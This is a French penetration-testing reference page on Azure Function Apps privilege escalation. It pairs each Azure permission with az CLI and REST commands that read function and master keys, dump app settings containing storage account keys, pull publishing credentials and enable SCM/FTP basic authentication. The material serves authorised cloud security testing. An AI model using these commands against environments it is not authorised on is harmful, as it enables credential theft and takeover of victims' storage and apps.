Az - Functions App Privesc

Function Apps

Consultez la page suivante pour plus d'informations :

Microsoft.Web/sites/host/listkeys/action

Cette permission permet de lister les clés de fonction, maître et système, mais pas celle de l'hôte, de la fonction spécifiée avec :

az functionapp keys list --resource-group <res_group> --name <func-name>

Microsoft.Web/sites/functions/listKeys/action

Cette autorisation permet d'obtenir la clé d'hôte de la fonction spécifiée avec :

az rest --method POST --uri "https://management.azure.com/subscriptions/<subsription-id>/resourceGroups/<resource-group>/providers/Microsoft.Web/sites/<func-name>/functions/<func-endpoint-name>/listKeys?api-version=2022-03-01"

Microsoft.Web/sites/host/functionKeys/write

Cette autorisation permet de créer/mette à jour une clé de fonction pour la fonction spécifiée avec :

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type functionKeys --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/masterKey/write

Cette autorisation permet de créer/mette à jour une clé maître pour la fonction spécifiée avec :

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/host/systemKeys/write

Cette autorisation permet de créer/mette à jour une clé de fonction système pour la fonction spécifiée avec :

az functionapp keys set --resource-group <res_group> --key-name <key-name> --key-type masterKey --name <func-key> --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ==

Microsoft.Web/sites/config/list/action

Cette autorisation permet d'obtenir les variables d'environnement d'une fonction. À l'intérieur de ces variables, il pourrait être possible de trouver les variables d'environnement par défaut AzureWebJobsStorage ou WEBSITE_CONTENTAZUREFILECONNECTIONSTRING qui contiennent en réalité une clé de compte pour accéder au stockage blob de la fonction avec des autorisations COMPLETES.

az functionapp config appsettings list --name <func-name> --resource-group <res-group>

Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write)

Cette autorisation permet de lister tous les profils de publication qui contiennent essentiellement des identifiants d'authentification de base :

# Gte creds
az functionapp deployment list-publishing-profiles \
--name basicauthenabled \
--resource-group Resource_Group_1 \
--output json

• Méthode SCM

Ensuite, vous pouvez accéder avec ces identifiants d'authentification de base à l'URL SCM de votre application de fonction et obtenir les valeurs des variables d'environnement :

# Get env variables values
curl -u '<username>:<password>' \
https://<app-name>.scm.azurewebsites.net/api/settings -v

Notez que le nom d'utilisateur SCM est généralement le caractère "$" suivi du nom de l'application, donc : $<app-name>.

Et ces variables d'environnement contiennent la AccountKey du compte de stockage qui stocke les données de l'application de fonction, permettant de contrôler ce compte de stockage.

Si vous voyez que ces informations d'identification sont REDACTED, c'est parce que vous devez activer l'option d'authentification de base SCM et pour cela, vous avez besoin de la deuxième autorisation (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):

# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'

# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'